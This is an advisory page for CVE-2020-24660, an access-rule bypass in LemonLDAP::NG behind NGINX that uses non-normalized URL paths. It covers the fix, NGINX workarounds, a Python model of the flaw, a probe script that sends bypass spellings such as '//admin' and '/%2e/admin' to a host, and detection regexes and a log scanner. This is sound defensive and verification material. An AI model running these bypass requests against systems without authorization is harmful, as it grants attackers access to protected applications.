CVE-2020-24660

9.8 CRITICAL

📋 TL;DR

When LemonLDAP::NG protects a virtual host behind NGINX, the handler matched its URL-based access rules against the request URI exactly as the client sent it, not against the normalized path the upstream application actually serves. A client that spells a protected path in a non-normalized form (doubled slashes, "." or ".." segments, percent-encoded characters) can therefore miss the restrictive rule written for the canonical path and fall through to a more permissive one. Affected: LemonLDAP::NG through 2.0.8 and the lemonldap-ng-handler package for Node.js before 0.5.2. No authentication is needed to trigger it.

💻 Affected Systems

Products:
  • LemonLDAP::NG
  • Lemonldap::NG handler for Node.js
Versions: LemonLDAP::NG through 2.0.8; Node.js handler before 0.5.2
Operating Systems: All platforms running affected software
Default Config Vulnerable: ⚠️ Yes
Notes: The CVE is scoped to deployments in which NGINX front-ends the protected virtual host and calls the handler through the auth_request module. Apache-based deployments are not covered by this CVE.

📦 What is this software?

LemonLDAP::NG is an open-source Web SSO, access-management and identity-federation platform written in Perl. It consists of a portal (authentication), a manager (configuration) and per-web-server handlers that enforce access on each protected virtual host. A handler checks the user's session and matches the request URI against the virtual host's regular-expression access rules (for example a rule restricting ^/admin to administrators, with a 'default' rule for everything else). With NGINX the handler runs in an auth_request sub-request and only sees what NGINX forwards to it.
⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete bypass of authentication and authorization controls, allowing unauthorized access to sensitive applications and data behind the LemonLDAP::NG protection.

🟠

Likely Case

Unauthorized access to protected applications and resources that should require authentication.

🟢

If Mitigated

Limited impact with proper network segmentation and additional authentication layers, though access control bypass remains possible.

🌐 Internet-Facing: HIGH - Internet-facing applications protected by vulnerable LemonLDAP::NG instances are directly exposed to exploitation attempts.
🏢 Internal Only: MEDIUM - Internal systems are still at risk from internal attackers or compromised accounts, though attack surface is reduced.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: No public exploit known; none is needed, since the attack is a single GET request with a rewritten path.
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation is one unauthenticated HTTP request. The attacker spells a protected path in a non-normalized form (doubled slashes, "./" or "../" segments, percent-encoded characters) so that it fails to match the restrictive rule written for the canonical path, while the upstream application still resolves it to that canonical path and serves the content. No session, credentials or user interaction are required.
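To make the failure mode concrete, the following is an added Python model written for this page (the editor's example, not LemonLDAP::NG code) of rule matching on the raw request-target versus the normalized path. The rule set, the verdict names, the normalize_uri routine and the list of variants are this example's own constructions; the product's actual matching and normalization code is not reproduced.

```python
import re
from urllib.parse import unquote

# Constructed virtual-host rule set in the spirit of LemonLDAP::NG access rules:
# regex -> verdict, plus a catch-all "default". Names are this example's own.
RULES = [
    (re.compile(r"^/admin"), "admin_only"),    # only an admin session may pass
    (re.compile(r"^/api/internal"), "deny"),   # never reachable from outside
]
DEFAULT = "accept"                              # everything else: any logged-in user

# Hand-picked non-normalized spellings of two protected paths (constructed).
VARIANTS = {
    "/admin": ["//admin", "/./admin", "/static/../admin", "/%2e/admin", "/%61dmin"],
    "/api/internal/users": ["//api/internal/users", "/api/./internal/users",
                            "/api%2Finternal/users"],
}


def normalize_uri(uri: str) -> str:
    """Canonicalise a request-target the way most upstreams do before routing:
    percent-decode the path, collapse repeated slashes, resolve '.' and '..'.
    The query string is carried over untouched."""
    path, sep, query = uri.partition("?")
    path = unquote(path)
    segments = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments) + sep + query


def evaluate(uri: str, normalize: bool) -> str:
    """Verdict of the first matching rule. normalize=False models the vulnerable
    behaviour (regexes applied to the raw request-target); normalize=True models
    the fixed behaviour (regexes applied to the canonical path)."""
    target = normalize_uri(uri) if normalize else uri
    for pattern, verdict in RULES:
        if pattern.search(target):
            return verdict
    return DEFAULT


def compare(path: str) -> dict:
    """Map each spelling of `path` to (vulnerable verdict, fixed verdict)."""
    return {v: (evaluate(v, False), evaluate(v, True)) for v in [path] + VARIANTS[path]}


if __name__ == "__main__":
    for canonical in VARIANTS:
        for spelling, (raw, fixed) in compare(canonical).items():
            flag = "  <-- bypass" if raw != fixed else ""
            print(f"{spelling:28} raw={raw:11} normalized={fixed}{flag}")
```

Every non-canonical spelling is accepted by the raw matcher and correctly restricted by the normalizing one; that gap is the vulnerability, and the patch closes it by normalizing before the rules are applied.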

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: LemonLDAP::NG 2.0.9+; Node.js handler 0.5.2+

Vendor Advisory: https://github.com/LemonLDAPNG/node-lemonldap-ng-handler/security/advisories/GHSA-x44x-r84w-8v67

Restart Required: Yes

Instructions:

1. Update LemonLDAP::NG to version 2.0.9 or later.
2. Update the Node.js handler (lemonldap-ng-handler) to version 0.5.2 or later.
3. Restart NGINX and the handler process (FastCGI/uWSGI server or Node.js service) so the new code is loaded.
4. Verify the fix: request a protected path both in its canonical form and in non-normalized spellings (doubled slashes, ./ and ../ segments, percent-encoded characters) and confirm every spelling gets the same verdict as the canonical path.

🔧 Temporary Workarounds

URI Normalization Enforcement

linux

Root cause to keep in mind: NGINX routes on $uri (percent-decoded, slashes merged, dot segments resolved), but the path the handler receives in the auth_request sub-request is typically the raw $request_uri. 'merge_slashes' is already on by default and only affects $uri; it does not change $request_uri, so adding it does nothing for this bug.

Options, in order of preference (editor's suggestions derived from NGINX semantics, not a vendor-published workaround; test on a staging host first):

1. In the auth_request location that calls the handler, forward the normalized path instead of the raw one, i.e. build the forwarded URI from $uri$is_args$args rather than $request_uri, so the rules are matched against the same path NGINX routes. Caveat: $uri is already percent-decoded, so any rule written to match an encoded form will behave differently.
2. Fail closed: set the virtual host's 'default' rule to deny and grant access only through explicit rules. A non-normalized URI that escapes a restrictive rule then lands on deny rather than accept. This does not cover the reverse case, where a crafted path matches a broad permissive rule (accept, unprotect or skip on a prefix) but resolves elsewhere upstream, so keep permissive rules narrow and anchored.
3. Block the non-normalized spellings at the edge (see the WAF bullet under "If You Can't Patch").

🧯 If You Can't Patch

  • Implement additional authentication layer (e.g., IP whitelisting, client certificate authentication) for protected resources
  • Deploy WAF rules to detect and block non-normalized request-targets aimed at protected endpoints: doubled slashes, "/./" and "/../" segments, %2e, %2f and %5c sequences, and double-encoded (%25) characters

🔍 How to Verify

Check if Vulnerable:

You are exposed if both hold: (a) NGINX front-ends the virtual host and calls the LemonLDAP::NG handler through auth_request, and (b) the handler is LemonLDAP::NG 2.0.8 or older, or lemonldap-ng-handler for Node.js older than 0.5.2. Apache-only deployments are outside the scope of this CVE.

Check Version:

For LemonLDAP::NG: 'dpkg -l | grep lemonldap-ng' or 'rpm -qa | grep lemonldap-ng'; the installed Perl modules report the same version with perl -MLemonldap::NG::Handler -e 'print $Lemonldap::NG::Handler::VERSION' (the version is also shown in the manager web UI). For Node.js: 'npm ls lemonldap-ng-handler' in the handler's project directory, or read the version field of its package.json.

Verify Fix Applied:

Without a session, request a path covered by a restrictive rule in its canonical form and note the result (the handler should answer 401/403 or redirect to the portal with a 302). Then request the same path in non-normalized spellings (doubled slashes, ./ and ../ segments, percent-encoded characters). After the fix every spelling must produce the same result as the canonical request; a 200 carrying application content for any spelling means the bypass is still present.
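An added probe script for that check (the editor's example, not a vendor tool). It uses http.client, which sends the request-target byte-for-byte and follows no redirects, so nothing on the client side normalizes the path before NGINX sees it. The base URL and protected path are supplied on the command line; the host shown in the help text is hypothetical. Run it only against hosts you are authorized to test.

```python
import argparse
import http.client
from urllib.parse import urlsplit


def build_variants(path: str) -> list:
    """Non-normalized spellings of a protected path. Each resolves back to `path`
    once an upstream normalizes it, so a patched handler must treat all of them
    exactly like the canonical request."""
    if not path.startswith("/") or len(path) < 2:
        raise ValueError("path must be absolute and non-empty")
    return [
        "/" + path,                                  # //admin
        "/." + path,                                 # /./admin
        "/x/.." + path,                              # /x/../admin
        "/%2e" + path,                               # /%2e/admin
        "/%%%02X%s" % (ord(path[1]), path[2:]),      # /%61dmin
        path + "/",                                  # trailing slash
    ]


def fetch_status(base_url: str, request_target: str, timeout: float = 5.0) -> int:
    """GET request_target from base_url and return the HTTP status code."""
    u = urlsplit(base_url)
    conn_cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(u.hostname, u.port, timeout=timeout)
    try:
        conn.request("GET", request_target,
                     headers={"Host": u.netloc, "User-Agent": "llng-uri-check"})
        return conn.getresponse().status
    finally:
        conn.close()


def classify(baseline: int, status: int) -> str:
    """Compare a variant's status with the canonical path's status. An
    unauthenticated request to a protected path should never get the
    application's 200; the handler answers 401/403 or redirects (302)."""
    if baseline == 200:
        return "inconclusive: canonical path is not protected from this client"
    if status == baseline:
        return "ok: same verdict as canonical path"
    if status == 200:
        return "BYPASS: application content served"
    return f"differs ({status} vs {baseline}); inspect manually"


def probe(base_url: str, path: str) -> dict:
    """Status and verdict for the canonical path and each of its variants."""
    baseline = fetch_status(base_url, path)
    results = {path: (baseline, "baseline")}
    for variant in build_variants(path):
        status = fetch_status(base_url, variant)
        results[variant] = (status, classify(baseline, status))
    return results


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="CVE-2020-24660 access-rule normalization check")
    ap.add_argument("base_url", help="scheme and host, e.g. https://app.example.com (hypothetical)")
    ap.add_argument("path", help="a path covered by a restrictive rule, e.g. /admin")
    args = ap.parse_args()
    for target, (status, verdict) in probe(args.base_url, args.path).items():
        print(f"{status}  {target:30} {verdict}")
```

If the canonical path itself returns 200, you are either already authenticated or the path is not actually protected, and the run proves nothing; pick a path whose canonical form is refused first.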

📡 Detection & Monitoring

Log Indicators:

  • Successful (200) responses for protected paths from clients that have no session cookie or whose canonical requests were redirected to the portal
  • Redirects to the portal for a canonical path followed, from the same client, by a 200 for a non-normalized spelling of the same path
  • Requests whose request line contains doubled slashes, "/./" or "/../" segments, %2e/%2f/%5c sequences, or double-encoded characters (NGINX logs the request line as the client sent it, so these survive in the access log)

Network Indicators:

  • HTTP requests with abnormal URI structures to protected endpoints
  • Traffic bypassing expected authentication flows

SIEM Query:

source="nginx" AND (uri="*//*" OR uri="*/./*" OR uri="*/../*" OR uri="*%2e*" OR uri="*%2f*" OR uri="*%5c*" OR uri="*%25*") AND response_code=200

Field names are illustrative (Splunk-style); map them to your NGINX log schema, and make sure the indexed URI field comes from $request or $request_uri rather than $uri, which NGINX has already normalized. Expect some benign hits from sloppy clients; the signal is a 200 for a path that the same client could not reach in canonical form.
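The query above is a starting point. As an added example (the editor's code, not from the vendor or the page), the following applies the same idea to NGINX combined-format access log lines, which record the request line as the client sent it. The log lines are constructed for this example; the detection pattern is the editor's and will need tuning per site.

```python
import re

# Constructed NGINX combined-format access log lines (not from a real host).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Sep/2020:14:02:11 +0000] "GET /admin HTTP/1.1" 302 138 "-" "curl/7.68.0"
203.0.113.7 - - [10/Sep/2020:14:02:13 +0000] "GET //admin HTTP/1.1" 200 4312 "-" "curl/7.68.0"
203.0.113.7 - - [10/Sep/2020:14:02:15 +0000] "GET /static/../admin/users HTTP/1.1" 200 9901 "-" "curl/7.68.0"
198.51.100.4 - - [10/Sep/2020:14:03:01 +0000] "GET /app/%2e%2e/admin HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Sep/2020:14:03:05 +0000] "GET /css/site.css HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Sep/2020:14:04:00 +0000] "GET //admin HTTP/1.1" 302 138 "-" "python-requests/2.24"
"""

# Combined log format: remote - user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Spellings a raw-string regex rule will not match but an upstream resolves.
NON_NORMALIZED = re.compile(
    r"//"                              # doubled slash
    r"|/\.(?:/|$)"                     # "." segment
    r"|/\.\.(?:/|$)"                   # ".." segment
    r"|%2[ef]"                         # encoded "." or "/"
    r"|%5c"                            # encoded backslash
    r"|%25"                            # double encoding
    r"|%(?:[46][1-9a-f]|[57][0-9a])",  # needlessly encoded ASCII letter
    re.IGNORECASE,
)


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_non_normalized(target: str) -> bool:
    """True if the path part of the request-target is spelled non-canonically."""
    path = target.split("?", 1)[0]     # only the path is matched by access rules
    return NON_NORMALIZED.search(path) is not None


def scan(lines):
    """Return (attempts, successes): every non-normalized request, and the subset
    that received a 200, which is the signature of a rule bypass that worked."""
    attempts, successes = [], []
    for line in lines:
        rec = parse_line(line)
        if rec and is_non_normalized(rec["target"]):
            attempts.append(rec)
            if rec["status"] == 200:
                successes.append(rec)
    return attempts, successes


if __name__ == "__main__":
    attempts, successes = scan(SAMPLE_LOG.splitlines())
    print(f"{len(attempts)} non-normalized requests, {len(successes)} answered with 200")
    for rec in successes:
        print(f"  {rec['ts']} {rec['ip']} {rec['method']} {rec['target']} -> {rec['status']}")
```

On the sample, the two 302 lines are the canonical request and a variant the handler refused; the three 200 lines for non-normalized spellings of /admin are what an analyst should pivot on, correlating by client address with the refused canonical request just before them.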

🔗 References

  • GitHub security advisory for the Node.js handler: https://github.com/LemonLDAPNG/node-lemonldap-ng-handler/security/advisories/GHSA-x44x-r84w-8v67
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2020-24660